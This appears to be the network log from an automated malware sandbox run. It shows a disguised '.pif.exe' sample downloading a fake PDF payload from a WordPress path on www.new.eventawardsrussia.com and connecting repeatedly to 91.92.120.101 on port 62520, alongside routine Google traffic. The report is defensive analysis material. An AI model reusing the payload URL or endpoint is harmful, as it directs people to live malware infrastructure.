                                                                                                                                                                                          May 14, 2025 04:32:05.122323990 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:05.122404099 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:05.124222994 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:05.174796104 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:05.318990946 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:05.319276094 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:05.319356918 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:05.319746017 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:05.321655035 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:05.321732998 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:06.334881067 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:06.334949017 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:06.335125923 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:06.537513971 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:06.538033962 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:06.538103104 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:06.538140059 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:06.539952993 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:06.540034056 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:14.956621885 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:14.956716061 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:14.956816912 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:14.959892988 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:14.959917068 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.553905964 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.554016113 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.555124044 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.555136919 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.555757046 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.556746960 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.556767941 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.556801081 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.557441950 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.557581902 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.558495045 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.612442970 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.918201923 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.918890953 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.918915987 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.918935061 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.918952942 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.918977022 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.919018984 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.919018984 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.919018984 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.919056892 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.919111967 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.919626951 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.919713974 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.919858932 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.919941902 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:15.924947977 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:15.974680901 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:16.125965118 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:16.126816988 CEST4434975452.149.20.212192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:16.126897097 CEST49754443192.168.2.452.149.20.212
                                                                                                                                                                                          May 14, 2025 04:32:19.196288109 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.196363926 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.196564913 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.199754000 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.253422022 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.364130020 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364871025 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364885092 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364928007 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364942074 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.364947081 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364974976 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.364989996 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365005970 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365005970 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365011930 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365026951 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365034103 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365046978 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365051031 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365067005 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365078926 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365086079 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365135908 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365652084 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365664005 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365719080 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.365773916 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365783930 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.365839958 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.366225004 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.366240025 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.366301060 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.366517067 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.366549015 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.366560936 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.366624117 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.367062092 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.367153883 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.367824078 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.367906094 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.368401051 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.368484974 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.368710995 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.368776083 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:19.373060942 CEST44349740142.250.68.225192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:19.373121023 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:41.649343014 CEST804970923.55.219.177192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:41.649466991 CEST4970980192.168.2.423.55.219.177
                                                                                                                                                                                          May 14, 2025 04:32:49.706958055 CEST49745443192.168.2.4142.250.69.14
                                                                                                                                                                                          May 14, 2025 04:32:49.707017899 CEST44349745142.250.69.14192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:50.034514904 CEST49747443192.168.2.4142.250.68.228
                                                                                                                                                                                          May 14, 2025 04:32:50.034570932 CEST44349747142.250.68.228192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:51.552998066 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:51.553030968 CEST44349748192.178.49.206192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:52.668071985 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:52.694531918 CEST49748443192.168.2.4192.178.49.206
                                                                                                                                                                                          May 14, 2025 04:32:52.695758104 CEST49745443192.168.2.4142.250.69.14
                                                                                                                                                                                          May 14, 2025 04:32:52.972660065 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:52.972755909 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:52.983134985 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:52.983208895 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:53.184499025 CEST49740443192.168.2.4142.250.68.225
                                                                                                                                                                                          May 14, 2025 04:32:53.184499025 CEST49747443192.168.2.4142.250.68.228
                                                                                                                                                                                          May 14, 2025 04:32:53.290172100 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:53.290452957 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:53.597070932 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:53.597343922 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:53.903070927 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:54.007059097 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:54.351130962 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:54.352507114 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:54.421286106 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:54.697137117 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:54.700431108 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:54.727838039 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:54.728347063 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:55.034889936 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:55.035353899 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:55.380775928 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:55.381208897 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:55.726212025 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:55.746566057 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:55.795754910 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:56.101372004 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:56.113106966 CEST4975562520192.168.2.491.92.120.101
                                                                                                                                                                                          May 14, 2025 04:32:56.418539047 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:58.018851995 CEST625204975591.92.120.101192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:58.019071102 CEST4975562520192.168.2.491.92.120.101

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          May 14, 2025 04:31:23.544229984 CEST5602353192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:31:24.453741074 CEST53560231.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:00.519133091 CEST5564753192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:00.519133091 CEST5987453192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:00.522784948 CEST53605861.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:00.559431076 CEST53562421.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:00.659944057 CEST53640281.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:00.660192966 CEST53598741.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:00.660459995 CEST53556471.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:01.663197994 CEST5494453192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:01.663378000 CEST5839153192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:01.809597969 CEST53583911.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:01.810458899 CEST53549441.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:02.597132921 CEST53524071.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:03.639272928 CEST6362653192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:03.639272928 CEST5039853192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:03.697734118 CEST5764553192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:03.697864056 CEST5286853192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:03.780729055 CEST53503981.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:03.780842066 CEST53636261.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:03.839085102 CEST53576451.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:03.839598894 CEST53528681.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:04.257972002 CEST53524121.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:04.631110907 CEST5282253192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:04.631664038 CEST6443253192.168.2.41.1.1.1
                                                                                                                                                                                          May 14, 2025 04:32:04.772428036 CEST53528221.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:04.773428917 CEST53644321.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:09.833719015 CEST53553981.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:11.271157026 CEST53649971.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:11.272495031 CEST53561611.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:21.316236973 CEST53591601.1.1.1192.168.2.4
                                                                                                                                                                                          May 14, 2025 04:32:30.435291052 CEST138138192.168.2.4192.168.2.255
                                                                                                                                                                                          May 14, 2025 04:32:40.312496901 CEST53513081.1.1.1192.168.2.4

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          May 14, 2025 04:31:23.544229984 CEST192.168.2.41.1.1.10x34ffStandard query (0)www.new.eventawardsrussia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:00.519133091 CEST192.168.2.41.1.1.10x8d93Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:00.519133091 CEST192.168.2.41.1.1.10x5929Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:01.663197994 CEST192.168.2.41.1.1.10x688fStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:01.663378000 CEST192.168.2.41.1.1.10x1260Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.639272928 CEST192.168.2.41.1.1.10x547eStandard query (0)ogads-pa.clients6.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.639272928 CEST192.168.2.41.1.1.10xd253Standard query (0)ogads-pa.clients6.google.com65IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.697734118 CEST192.168.2.41.1.1.10xfd2aStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.697864056 CEST192.168.2.41.1.1.10x168eStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:04.631110907 CEST192.168.2.41.1.1.10xd9f0Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:04.631664038 CEST192.168.2.41.1.1.10xe625Standard query (0)play.google.com65IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          May 14, 2025 04:31:24.453741074 CEST1.1.1.1192.168.2.40x34ffNo error (0)www.new.eventawardsrussia.com5.23.51.54A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:00.660192966 CEST1.1.1.1192.168.2.40x5929No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:00.660459995 CEST1.1.1.1192.168.2.40x8d93No error (0)www.google.com142.250.68.228A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:01.809597969 CEST1.1.1.1192.168.2.40x1260No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:01.810458899 CEST1.1.1.1192.168.2.40x688fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:01.810458899 CEST1.1.1.1192.168.2.40x688fNo error (0)googlehosted.l.googleusercontent.com142.250.68.225A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.780842066 CEST1.1.1.1192.168.2.40x547eNo error (0)ogads-pa.clients6.google.com192.178.49.170A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.839085102 CEST1.1.1.1192.168.2.40xfd2aNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.839085102 CEST1.1.1.1192.168.2.40xfd2aNo error (0)plus.l.google.com142.250.69.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:03.839598894 CEST1.1.1.1192.168.2.40x168eNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          May 14, 2025 04:32:04.772428036 CEST1.1.1.1192.168.2.40xd9f0No error (0)play.google.com192.178.49.206A (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • www.new.eventawardsrussia.com
                                                                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                                                                          • clients2.google.com
                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                          • apis.google.com
                                                                                                                                                                                          • play.google.com

                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.449723142.250.69.14808080C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          May 14, 2025 04:32:00.696918011 CEST411OUTGET /time/1/current?cup2key=8:SnjlZAUeVm6xtI_C2goXEgiCo07jXuLMeAGmhRwoAXk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1
                                                                                                                                                                                          Host: clients2.google.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          May 14, 2025 04:32:00.878230095 CEST1141INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                          Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          x-cup-server-proof: 3045022100ded3dcc0cf45740a2294b83ce5b1b53e6569930a497441f862f73a0ddb5575420220267e84da8792481b7205f4c106accc9f56f21fe802a24abbb2f3989542ffdd2c:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
                                                                                                                                                                                          ETag: W/"3045022100ded3dcc0cf45740a2294b83ce5b1b53e6569930a497441f862f73a0ddb5575420220267e84da8792481b7205f4c106accc9f56f21fe802a24abbb2f3989542ffdd2c:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                          Date: Wed, 14 May 2025 02:32:00 GMT
                                                                                                                                                                                          Content-Disposition: attachment; filename="json.txt"; filename*=UTF-8''json.txt
                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Data Raw: 36 32 0d 0a 1f 8b 08 00 00 00 00 00 02 ff d2 8c ad 55 e7 aa 56 4a 2e 2d 2a 4a cd 2b 89 2f c9 cc 4d 8d cf cd cc c9 c9 2c 56 b2 32 34 37 31 37 b4 b0 b4 34 32 30 b7 30 d7 51 2a 4e 2d 2a 4b 2d 8a cf cb cf 4b 4e 55 b2 d2 35 d4 33 34 37 35 b5 30 b6 30 35 32 35 31 37 30 33 32 71 d5 35 32 37 a9 05 00 00 00 ff ff 0d 0a
                                                                                                                                                                                          Data Ascii: 62UVJ.-*J+/M,V247174200Q*N-*K-KNU534750052517032q527
                                                                                                                                                                                          May 14, 2025 04:32:00.878247976 CEST20INData Raw: 61 0d 0a 03 00 89 e0 b0 30 52 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: a0R0


                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.4497145.23.51.54443892C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:31:25 UTC232OUTGET /wp-includes/Ypeyqku.pdf HTTP/1.1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
                                                                                                                                                                                          Host: www.new.eventawardsrussia.com
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2025-05-14 02:31:25 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.26.3
                                                                                                                                                                                          Date: Wed, 14 May 2025 02:31:25 GMT
                                                                                                                                                                                          Content-Type: application/pdf
                                                                                                                                                                                          Content-Length: 1388560
                                                                                                                                                                                          Last-Modified: Tue, 13 May 2025 23:50:32 GMT
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          ETag: "6823dac8-153010"
                                                                                                                                                                                          Expires: Thu, 14 May 2026 02:31:25 GMT
                                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2025-05-14 02:31:25 UTC1460INData Raw: dc dd 28 f5 16 8c 22 62 8e 37 a5 ff 61 45 80 8a 53 84 36 cd 2b cd bb 7c 9c 67 06 e9 59 98 b2 07 0d f3 df 46 83 e5 2e a9 55 65 36 b0 0e 7c 1b 04 4f fc fc f8 80 17 6f a7 60 44 1d b6 cd 53 95 21 80 c2 19 83 20 eb cd 12 e4 a0 b3 cc 8f d8 7e d2 9f ed 5b dd 00 ff 31 8b 52 6b d6 a4 b4 f3 0d f4 6a 3a d0 36 b4 d6 2e bc 21 cc 60 6c 45 d1 48 f9 46 c3 09 a3 f4 94 68 2c 25 37 2c 0b c9 40 1f 65 c9 4c 6f e7 d0 3c 4b 37 1d 18 b5 dc 9d a8 5d 0c d0 4d 8c 31 9f 8a 71 46 5f 91 11 2d 39 16 3a ff 2c 8a 5a 55 bb 29 c9 c6 ca 28 ae 1e db 03 8e 6d 79 7e 07 d3 ad 24 44 77 7a c8 e7 e8 5d 3b 92 7a d6 af ab 64 9f 27 e9 52 eb 23 c3 3d 0a 5e d4 6c f2 53 0e d6 ea 25 09 3a 8c ca 86 ee 40 67 48 16 db 85 4b 12 75 8b d6 e1 1e 6e 67 83 b1 02 54 9d 64 eb b7 84 58 e6 26 dc 1c 96 98 5b 95 71 e8
                                                                                                                                                                                          Data Ascii: ("b7aES6+|gYF.Ue6|Oo`DS! ~[1Rkj:6.!`lEHFh,%7,@eLo<K7]M1qF_-9:,ZU)(my~$Dwz];zd'R#=^lS%:@gHKungTdX&[q
